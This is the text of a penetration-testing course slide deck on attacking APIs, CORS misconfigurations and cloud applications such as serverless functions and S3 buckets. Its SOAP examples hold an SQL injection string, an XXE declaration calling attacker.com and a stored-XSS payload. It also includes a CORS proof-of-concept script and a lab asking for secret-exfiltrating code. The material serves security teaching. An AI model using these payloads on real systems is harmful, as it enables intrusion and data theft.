Scribd
Upload
480 views140 pages

114 Pentesting APIs and Cloud Applications

The document discusses APIs and API testing. It introduces APIs and their main types, SOAP and REST. It describes typical API elements like requests, responses, and documentation files. It also discusses tools that can help test APIs and generate valid requests. The document focuses on understanding and attacking API-based applications.

Uploaded by

amin jahromi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
480 views140 pages

114 Pentesting APIs and Cloud Applications

The document discusses APIs and API testing. It introduces APIs and their main types, SOAP and REST. It describes typical API elements like requests, responses, and documentation files. It also discusses tools that can help test APIs and generate valid requests. The document focuses on understanding and attacking API-based applications.

Uploaded by

amin jahromi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 140

Web Application

Penetration Testing
eXtreme

Pentesting APIs & Cloud


Applications
S e c t i o n 0 1 | M o d u l e 1 4
© Caendra Inc. 2020
All Rights Reserved
Table of Contents

MODULE 14 | PENTESTING APIs & CLOUD APPLICATIONS

14.1 Introduction to APIs 14.4 Resource Sharing

14.2 API Testing & 14.5 Attacking Cloud


Attacking Based Applications

14.3 API Access Control

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.2


Learning Objectives

By the end of this module, you should have a


better understanding of:

✓ Attacking API based applications


✓ Common vulnerabilities found in Cloud environments

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.3


14.1

Introduction to APIs

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.4


14.1 Introduction to APIs
API stands for Application Programming Interface. It is a non-GUI
collection of endpoints in a standardized form so it can be used
by human user as well as a machine. It is often accompanied by
documentation that can be in both a machine and a human-
readable form.

There are lots of APIs, for example Windows API, remote APIs
like RPC (Remote Procedure Call), but we will focus on web APIs,
mainly:
• Web services (SOAP/XML)
• REST APIs (JSON)
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.5
14.1 Introduction to APIs

From a technical standpoint, API differs from a website


because:
• It has a standardized input/output form so that it can be
scripted.
• It is language independent (it should work on each
platform in the same way).
• It aims to be secure (e.g., it allows only some predefined
methods).
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.6
14.1 Introduction to APIs

SOAP API utilizes the Simple Object Access Protocol to


define communication standard – so how the request and
response looks, as well as the parameters can be passed in
them.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.7


14.1 Introduction to APIs

SOAP Messages (HTTP


Requests) are an XML type POST /Uripath HTTP/1.1
Host: www.example.com

and must contain some Content-Type: application/soap+xml; charset=utf-8


Content-Length: 299

special elements. SOAPAction: "http://www.w3.org/2003/05/soap-


envelope"

• Content type text/xml is <?xml version="1.0"?>

also allowed. <soap:Envelope


xmlns:soap="http://www.w3.org/2003/05/soap-envelope"
xmlns:m="http://www.example.com">
• SOAPAction is sometimes <soap:Header>
</soap:Header>
used just for the standard <soap:Body>

and sometimes needs to


<m:MethodName>
<m:ParamName>PARAMETER VALUE</m:ParamName>

hold the called method </m:MethodName>


</soap:Body>

name. </soap:Envelope>

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.8


14.1 Introduction to APIs

HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: length

Here is the sample <?xml version="1.0" encoding="utf-8"?>


<soap:Envelope

response which follows the xmlns:xsi="http://www.w3.org/2001/XMLSchema-


instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
SOAP standard and is in xmlns:soap="http://schemas.xmlsoap.org/soap/envelope
/">

XML format. <soap:Body>


<MethodResult xmlns="http://tempuri.org/">
<ResultValue>TheValue</ResultValue>
</MethodResult>
</soap:Body>
</soap:Envelope>

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.9


14.1 Introduction to APIs

As said previously, API contains both human and machine-


readable documentation. For SOAP-based APIs, the
documentation is stored in WSDL files. Usually, these files
are stored under the „?wsdl” path, for example,
https://api.example.com/api/?wsdl.

You can take a look at an exemplary calculator service


online at address:
http://www.dneonline.com/calculator.asmx
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.10
14.1 Introduction to APIs

At the following address,


http://www.dneonline.com/calculator.asmx?op=Add, you
can see an exemplary SOAP request that was issued in
order to speak to the calculator service.

You can also see the full WSDL file at:


http://www.dneonline.com/calculator.asmx?wsdl

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.11


14.1 Introduction to APIs

As you can see, reconstructing each method separately to


create a valid request would be a time-consuming task. To
Turn the WSDL document into a working request, we can
use some automated tools, which will be presented in the
next chapter.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.12


14.1 Introduction to APIs

This kind of interface, equipped with documentation that


can be parsed by a machine, allows us to expose a large
number of methods where each of them has its own
purpose.

Another type of API is REST (Representational State


Transfer) APIs. Usually, the method client is about to call is
in the resource path:
GET /api/v2/methodName
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.13
14.1 Introduction to APIs

Depending on the request type, the parameters might be


passed differently.

In REST APIs, HTTP methods have some special meaning:


• GET – Read resource
• POST – Create resource
• PUT – Update resource
• DELETE – Delete resource
• PATCH – Update resource partially
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.14
14.1 Introduction to APIs

Except for GET requests, API methods parameters are


passed in the request body.

Remember, that the meaning of these methods is a


common practice and not a requirement, so technically it is
possible that a method you encounter does something
different (e.g., POST is used for logging in).

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.15


14.1 Introduction to APIs

An exemplary REST API


request can be seen to the POST /api/2.2/auth/signin HTTP/1.1

right: HOST: my-server


Content-Type:application/json

• Path often contains the Accept:application/json

API version {
"credentials": {

• Content-Type "name": "administrator",


"password": "passw0rd",
application/json header "site": {

is required
"contentUrl": ""
}
}
• Parameters are passed }

as JSON array
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.16
14.1 Introduction to APIs

It is also often possible to POST /api/2.2/auth/signin HTTP/1.1


pass the REST API HOST: my-server

parameters as XML, so the Content-Type:text/xml

equivalent of the request <tsRequest>


<credentials name="administrator"
from the previous slide password="passw0rd">
<site contentUrl="" />
would look like the listing to </credentials>

the right. </tsRequest>

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.17


14.1 Introduction to APIs

REST API also has a documentation standard called the


WADL file. A sample WADL can be viewed here:
https://www.w3.org/Submission/wadl/

Similar to WSDL, we will shortly present tools that help to


parse the lengthy file in order not to rewrite all the methods
manually.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.18


14.1 Introduction to APIs

In order to make developer’s (and penetration testers’) lives


easier, some APIs include a more human-friendly API
representation. For example, a very popular API engine
named Swagger is often found with its demo page, which
contains forms with description and possibility to issue a
request to each method.

You can see sample Swagger API here:


https://swagger.io/tools/swagger-ui/. Click on „Live Demo”
to try it yourself.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.19
14.1 Introduction to APIs

You can find more resources on APIs by clicking on the


below links:
• https://swagger.io/
• https://www.w3.org/TR/wsdl.html
• https://www.w3.org/Submission/wadl/
• https://www.w3.org/TR/soap/

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.20


14.2

API Testing and


Attacking

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.21


14.2 API Testing and Attacking

APIs are built in a way that one request path (one endpoint)
allows us to call one method (execute one type of action).
The path we are requesting is an abstract mapping to some
resources; that means, when requesting the endpoint
/api/v3/methodName, it does not reflect file/directory
structure on the server.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.22


14.2 API Testing and Attacking

The request is processed by a special component that


maps the path to certain operation handlers and not to
physical file/directory resources.

However, do not be discouraged from using your favorite


content discovery tools on the API enabled server. Some
server paths can be mapped to the API routines, but still,
some requests can be handled by the server in an original
way allowing it to expose files and directories to the user.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.23
14.2 API Testing and Attacking

It is possible than when you request /api/anything then every


character past „anything” is parsed by the API engine, but you
can still find interesting files on the server under, for example
/version.txt.

Regardless of the fact that APIs make use of predefined


methods, you should be aware that there can still be
vulnerabilities related to:
• Parameters to these predefined functions
• The API parsing itself
• Access to sensitive methods
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.24
14.2 API Testing and Attacking

We will cover each of these cases in the following slides.


First, as you encounter an API during a penetration test, you
should focus on the proper reconnaissance of the API
interface, which includes:
• What is the API name and version? Is it a custom
implementation or, for example, an open-source product?
• Is there any online documentation available? Are there
any interesting methods?
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.25
14.2 API Testing and Attacking

• Does the documentation exist on the target server


(?wsdl, ?wadl, or similar)?
• Does the API require authentication, or is publicly
available?
• If there is both local and public documentation for an
API, do they match? Maybe some methods were hidden
from local users (typically ones that allow insecure
operations).
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.26
14.2 API Testing and Attacking

Your purpose is to gather as many API endpoints as


possible and to be able to speak to them. You should also
be able to get the WSDL/WADL file for further testing.

Reconstructing API calls from a raw WSDL/WADL file would


be time-consuming, so a proper tool might help you to do it
faster. For API testing and parsing WSDL/WADL files into a
ready-to-use method set, you might want to use Postman,
the free edition of SOAPUI, or the Burp Pro extension called
WSDLer.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.27
14.2 API Testing and Attacking

You can download a


standalone installer of
SoapUI from its
homepage.We will present
its usage on Kali Linux.

At the time of the release of


the course, the latest
version is 5.5.0.
https://www.soapui.org/downloads/latest-release.html WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.28
14.2 API Testing and Attacking

SoapUI can be launched from its default location


/usr/local/bin/SoapUI-5.5.0

Otherwise, use the „locate SoapUI” command to find the


software.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.29


14.2 API Testing and Attacking
As the software is launched, you can first connect it to the proxy, in this
case, the burpsuite instance. This way, you will be able to replay and
change requests issued to the API. To set up the proxy, you need to go
to File → Preferences → Proxy Settings and point it to the burp
instance.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.30


14.2 API Testing and Attacking

You can then switch the proxying on and off by clicking the
Proxy button on the upper menu.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.31


14.2 API Testing and Attacking

Let’s now try to parse the


sample WSDL/WADL file.
There are sample files
shipped with the software
itself.

In order to load a WSDL (for


SOAP) or WADL (for REST),
click the respective buttons in
the SoapUI on the upper
menu.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.32
14.2 API Testing and Attacking

By default, you can find example WSDL/WADL files in


/root/SoapUI-Tutorials/WSDL-WADL/.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.33


14.2 API Testing and Attacking

If you now click on a tree node and then double click on


„Request”, a request window will appear. In this case, we
are viewing the „login” method.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.34


14.2 API Testing and Attacking

The method can be found in the WSDL file as well. SoapUI


automatically fills argument placeholders with „?”. It is you
who should decide what to fill in there. In that case, we see
that the application expects the argument of type „String”.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.35


14.2 API Testing and Attacking

If you press the green button, the request will be issued


and, in this case, will be proxied through Burp Suite.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.36


14.2 API Testing and Attacking

Testing REST APIs can be done exactly in the same way;


the difference is you import a WADL file instead of WSDL.

So, once you encounter a WSDL on the web application, you


can copy its source (Open it in a browser, go to Source, and
select all → copy & paste to a file) and import it to SoapUI.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.37


14.2 API Testing and Attacking

Remember that API is another transport mechanism for


some information that is sent to the API Consumer (i.e., the
application back-end).

With this in mind, you can try to tamper with everything that
is transported by the API – for example, in case of a request
similar to the previously presented one, you are free to
check if the username or passwords field is vulnerable to
injection attacks.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.38
14.2 API Testing and Attacking

POST /sample HTTP/1.1


Accept-Encoding: gzip, deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "http://www.soapui.org/sample/login"
Content-Length: 297
Host: www.soapui.org
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Here we see what a Connection: close

sample request might look <soapenv:Envelope


xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/

like.
" xmlns:sam="http://www.soapui.org/sample/">
<soapenv:Header/>
<soapenv:Body>
<sam:login>
<username>’ or ’1’=’1</username>
<password>test</password>
</sam:login>
</soapenv:Body>
</soapenv:Envelope>

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.39


14.2 API Testing and Attacking

POST /sample HTTP/1.1


Accept-Encoding: gzip, deflate
Content-Type: text/xml;charset=UTF-8

Of course, the API SOAPAction: "http://www.soapui.org/sample/login"


Content-Length: 297

implementation itself
Host: www.soapui.org
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: close

might be vulnerable to <!DOCTYPE soapenv:Envelope SYSTEM http://attacker.com/ssrf>

XXE attacks; however,


<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:sam="http://www.soapui.org/sample/">

modern APIs usually


<soapenv:Header/>
<soapenv:Body>
<sam:login>

disallow DTD declarations. <username>?</username>


<password>?</password>
</sam:login>
</soapenv:Body>
</soapenv:Envelope>

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.40


14.2 API Testing and Attacking

Basically, you are free to


tamper with any of the API POST /storeData HTTP/1.1
Accept-Encoding: gzip, deflate

parameters as long as the Content-Type: text/xml;charset=UTF-8


SOAPAction: „StoreData"

SOAP message structure is Content-Length: 297


Host: www.soapui.org

correct. User-Agent: Apache-HttpClient/4.1.1 (java 1.5)


Connection: close

<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"

In case you want to smuggle


xmlns:sam="http://www.soapui.org/sample/">
<soapenv:Header/>
<soapenv:Body>
XML-style data, you can <sam:storeData>
<text><![CDATA[<script>alert('stored
wrap them up in CDATA tags xss!')</script>]]></text>
</sam:storeData>

(XML comments), so the </soapenv:Body>


</soapenv:Envelope>

SOAP message is valid.


WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.41
14.3

API Access Control

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.42


14.3 API Access Control

In larger APIs, not every method is designed to be used by


each user. For example, the most common split is between
read-only users and read+write users. The latter has the
possibility to modify the contents of the API backend.

In APIs, you will rarely see cookies being used. More often,
the authentication mechanism will be basic authorization or
a kind of token – it can be a pre-generated token that will be
equivalent of a cookie, for example in the form of a header,
like X-Api-Token: adk32Kds38au39aU0s.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.43
14.3 API Access Control

Due to API requirements some specific content types or


custom headers are used along with the non-cookie
authentication, as they are less likely to be vulnerable to
Cross-Site Request Forgery attacks.

However, what often is found in the APIs is broken access


control. For example, Authorization Bypasses are very
common.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.44
14.3 API Access Control

In order to test an API in a complex way for Access control


flaws, one needs to:
• Prepare a working request to each API endpoint
• Generate a token (or authorization header) for each of
the API users
• Combine each API request with each token to see which
will work and which do not
• Remember to test each request, also without any token
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.45
14.3 API Access Control

Again, such test cases might be generated using SoapUI,


which allows us to issue a request to each API endpoint.
Also, as a reminder, double-check if the API implementation
uses all the methods provided by the original version.

For example, with Rundeck API there is a default possibility


of running OS commands, which might be hidden from the
documentation on a local API implementation.
• https://docs.rundeck.com/docs/api/rundeck-
api.html#adhoc
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.46
14.3 API Access Control

API tokens are susceptible to vulnerabilities commonly


diagnosed in session cookies, for example:
• Low entropy or predictable value
• Lack of invalidation
• Possible token leaks from the application infrastructure
or possibility to generate tokens in advance

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.47


14.3 API Access Control

Specific tokens that might grant you access to an API


interface are JWT tokens, as well as the so-called Bearer
Authentication.

These tokens will be explained more in detail in the


„Attacking Authentication & SSO” module.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.48


14.4

Resource Sharing

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.49


14.4 Resource Sharing

As APIs are often used both by <html><head>


humans and machines, the <script>
var xhr = new XMLHttpRequest();
latter have to be able to read the xhr.onreadystatechange = function()
API results using scripted {
if (xhr.readyState ==
solutions. XMLHttpRequest.DONE) {
alert(xhr.responseText);
}
Let’s say you want to get the }

content of a different website, xhr.open('GET',


'http://example.com', true);
example.com, on your webpage. xhr.send(null);</script></head></htm
l>
Consider the following code:
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.50
14.4 Resource Sharing

If you now try to receive the response content of the


example.com page, it will be blocked by the browser.

Accordingly, if someone enters a site with a similar script


and the response content will be attempted to be sent
instead of just displayed, the same constraint appears. It
will not be possible for the client-side javascript to read the
response due to Same Origin Policy restrictions.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.51
14.4 Resource Sharing

As APIs are meant to be also accessed by automated


agents in order to lose SOP constraints a bit, the Cross-
Origin Resource Sharing standard was implemented.

Simply put, CORS can add some exceptions to SOP by


specifying some special headers in the server response.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.52


14.4 Resource Sharing

We will be interested in two of these headers:


• Access-Control-Allow-Origin: [value]
• And Access-Control-Allow-Credentials: [true/false]

The first one specifies a domain that can access a certain


website’s response, while the second one specifies if it is
possible to add credentialing information (e.g., Cookies) to
the request.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.53
14.4 Resource Sharing

Access-Control-Allow-Origin value can be a domain, a


wildcard, or null.

A wildcard means that a script hosted on any domain can


access a response from that webpage.

A certain domain value means that scripts (or any other


user) from that domain can access the response.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.54
14.4 Resource Sharing

For example, if the page victim.com sends back the header


Access-Control-Allow-Origin: example.com, that means
that if an XHR requesting victim.com script is hosted on
example.com, and if the user visits example.com, the script
will access victim.com as that user and receive the
response.

However, if it is a static page, then nothing special happens


unless the victim.com allows another header Access-
Control-Allow-Credentials: true.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.55
14.4 Resource Sharing

In that case, if the user is logged on on victim.com and


visits the mentioned script on example.com, victim.com will
be visited in the context of logged-in users (the cookies will
be sent with an XHR request) and restricted content can be
stolen!

Browsers by default block responses if a site is overly


permissive (if they allow wildcard origin together with
credentials).
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.56
14.4 Resource Sharing

Trust with credentials to the arbitrary origin is a common


vulnerability, not only in APIs.

That means if a page is accessible only for logged in users


and it trusts the arbitrary origin, an exploit script can be
hosted on an attacker controlled domain. Once visited by a
user logged in on the target website, it can steal sensitive
information – user data or CSRF tokens.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.57
14.4 Resource Sharing

Let’s take a look at a <?php


simple exploitation case.
header("Access-Control-Allow-
We will issue a similar XHR Origin: " .
request to a CORS-enabled $_SERVER['HTTP_ORIGIN’]);
header("Access-Control-Allow-
page. Credentials: true");

echo "TOP SECRET STUFF";


A file is hosted on a php-
enabled apache server: ?>

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.58


14.4 Resource Sharing

If you now navigate to that page while using Burp Suite as a


proxy, you can observe how it reacts to a custom „Origin”
header.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.59


14.4 Resource Sharing

<html><head>
<script>
var xhr = new XMLHttpRequest();
The XHR script is now xhr.onreadystatechange = function() {
if (xhr.readyState ==
modified and example.com XMLHttpRequest.DONE) {

is replaced with the CORS }


alert(xhr.responseText);

enabled page: }
xhr.open('GET',
'http://192.168.139.195/cors.php', true);
xhr.send(null);</script></head></html>

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.60


14.4 Resource Sharing

You can now observe that access to the response was


gained. In an exploitation scenario, you may instead want to
send this data to your controlled server in a similar way that
you would steal a cookie using an XSS vulnerability.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.61


Hera Lab

Null Origin Exploitation


There is a sample website
that holds a secret token.
Your task is to prepare an
exploit that takes advantage
of a CORS configuration on
secret.php and, once opened
in another tab, access and
send the secret information
to another place in the same
way an XSS can steal a
cookie.
*Labs are only available in Full or Elite Editions of the course. To access, go to the course in your members area and
click the labs drop-down in the appropriate module line or to the virtual labs tabs on the left navigation. To
UPGRADE, click LINK.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.62
14.5

Attacking Cloud
Based Applications

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.63


14.5 Attacking Cloud Based Applications

Companies are transitioning some of their applications to


cloud services because they are generally scalable, reliable
and highly available. They also share some architectural
standards that makes them different from traditional web
applications.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.64


14.5 Attacking Cloud Based Applications

Different cloud providers have different vulnerabilities or


default configurations that can be abused from a
penetration testing perspective, offering a whole new attack
surface that will be explored in the following sections.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.65


14.5.1 Microservices

Different architectures and design evolution:


Monolithic design: One server is used for holding the web application and
needed services such as databases. This offers an easy setup and ease of
maintenance at a relatively cheap price but introduces several disadvantages.
Monolithic designs are difficult to scale and although the maintenance is
relatively easy, updating the server could cause downtimes and having a single
point of failure can be a disaster if there is no backup plan in place.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.66


14.5.1 Microservices

Tiered Monolithic: Services are separated, the web server is holding the web
application while a different server is holding the database or required services.
Tiered monolithic architecture offers the possibility of performing updates
without downtime and if servers are clustered and load-balanced the
performance improves over the previous approach. Tiered monolithic designs
are still hard to scale this is something that cannot be automated and if the
cluster itself can be a single point of failure that can only be recovered from
backups in case a disaster occurs.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.67


14.5.1 Microservices

Cloud solutions: Cloud solutions are build into elastic servers or services. This
means horizontal scaling is possible to implement and fully automate, giving a
better performance as new instances are created based on the resources
needed. Updates can also be performed without downtime and disasters do not
involve backups in most of the cases. Although there are a lot of advantages
over the previous designs, there are still problems at the application layer as it is
still one big codebase (monolithic) and costs can be hard to foreseen
depending on the services needed.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.68


14.5.2 Serverless Applications
Function as a Service (FaaS): Are serverless applications, usually code
functions, running in a cloud environment. This cloud environment and the
application stack is managed by the cloud operator. As a result, it has the
advantage of avoiding the the complexity of building and maintaining the
infrastructure typically associated with developing and launching an app.

Serverless applications have some limitations to be aware of, the execution


time is limited to a few minutes, threads, usable disk space and ram are also
limited, size of the code package and required dependencies have also
limitations and there is the need of a trigger/event to run the application and a
routing method or API gateway. With this limitations in mind, serverless
applications are not the best option for resources demanding jobs or tasks that
need more than 10 minutes of execution.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.69


14.5.3 Details of Serverless Architecture

Serverless architecture are different from normal web applications so there are
some concepts that must be clear in order to understand them:
API Routing: Routing layer calling the application based on the URL association,
rules and parameters. They make the functions to be reached from the internet.
In AWS its called API Gateway.
State: As mentioned before, the lifespan of a function is no more than a few
minutes, for this reason there is no local cache that can be used and
vulnerabilities like file command injections or file uploads are exploited in a
different way due to this facts.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.70


14.5.3 Details of Serverless Architecture
Cold Start: As the lifespan is limited, when the code has not been executed in a
while or for the first time, it needs to be downloaded, containerized, booted, and
primed to be run. This can be solved using 3rd party plugins like Serverless-
plugin-warmup.

Debugging: Having the benefit of not managing the infrastructure means there
are limitations with debugging due to the lack of access to logs. Instead of
logging, another approaches such as printing variables or local lambda are
usually put in practice for debugging applications.

No Ops: Limited sysadmin tasks as the environment is managed by the cloud


operator. Backups, security monitoring and logging it is still necessary.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.71
14.5.3 Details of Serverless Architecture

With microservices and serverless apps there are some


changes related to security. Network security changes
drastically as the security model of functions does not rely
on IP addresses and ports. Instead, they share the same
external IP address and there are no local network
restriction for them inside the host. Although network
restrictions are barely used, in order to apply restrictions
cloud provided access controls and permissions are used.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.72


14.5.3.1 Serverless Application Example

To understand the concept explained in the previous slides,


we will deploy a serverless function application in AWS. It is
necessary to create an AWS Account for this purpose.
Damn Vulnerable Serverless Application (DVSA) from
OWASP is the learning environment to be deployed and
used in this example.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.73


14.5.3.1 Serverless Application Example

Head over https://aws.amazon.com/lambda to start creating a


function.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.74
14.5.3.1 Serverless Application Example
1. Go to lambda, create
application
2. Other Options
3. Browse Serverless app
repository
4. Mark the option “Show
apps that create custom
IAM roles or resource
policies”
5. Search DVSA
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.75
14.5.3.1 Serverless Application Example

Go to the AWS System


manager, Parameter Store
and look for the DVSA URL

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.76


14.5.3.1 Serverless Application Example

Now head to the URL and


register an account. It should be
a real email for receiving the
activation code.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.77


14.5.3.1 Serverless Application Example

Now the application has been deployed and we will come back to it
later. Remember to delete resources once you finish working with them.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.78


14.5.4 S3 Buckets

Simple Storage Service (S3) is an AWS scalable and


distributed file system. These filesystems root folder are
referred as buckets while everything else (files, subfolders)
are referred as objects. Misconfigured S3 buckets have
been the principal cause of many information leaks and
attacks against organizations.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.79


14.5.4 S3 Buckets

For further understanding of the security features inside S3


buckets, head to your AWS Account and let’s create a new
S3 bucket.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.80


14.5.4 S3 Buckets

While creating buckets, there


are several configuration
options that can be selected
in the process.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.81


14.5.4 S3 Buckets

Access control and encryption


can be specified at this stage.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.82


14.5.4 S3 Buckets

Common S3 attacks consist in unauthorized access to


objects. These attacks often gives the capability of
modifying and creating new objects and changing existing
policies and permissions on S3 buckets.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.83


14.5.5 Tool: s3recon

Automating the discovery of misconfigured buckets can be


done using S3Recon. Instructions on how to clone and
install the tool are provided in the Github repository.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.84


14.5.5 Tool: s3recon

Python-pip can
be used to install
S3Recon,
although you
might be aware
of missing
dependencies
during the
process and
install them too.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.85
14.5.5 Tool: s3recon

S3Recon needs a wordlist, there is one in the Github


repository or a personalized one can be created based on
your needs. At this moment the one from the repository will
be used.
curl -sSfL -o "word-list.txt" "https://raw.githubusercontent.com/clarketm/s3recon/master/data/words.txt"

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.86


14.5.5 Tool: s3recon

Running S3 recon with the wordlist file can be done with the
following command:
s3recon "word-list.txt" -o "results.json" --public

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.87


14.5.5 Tool: s3recon

Buckets marked as ”public” could give access to restricted


content. Objects could be accessed via aws-cli.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.88


14.5.5 Tool: s3recon

S3Recon can be integrated with MongoDB for scraping


large results. This proves useful in bug bounty programs
where any assets belonging to the company are within the
scope.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.89


14.5.5 Tool: s3recon

Some reports from hackerone related to S3


misconfigurations can be reviewed in the following links:
• https://hackerone.com/reports/631529
• https://hackerone.com/reports/507097
• https://hackerone.com/reports/504600
• https://hackerone.com/reports/209223
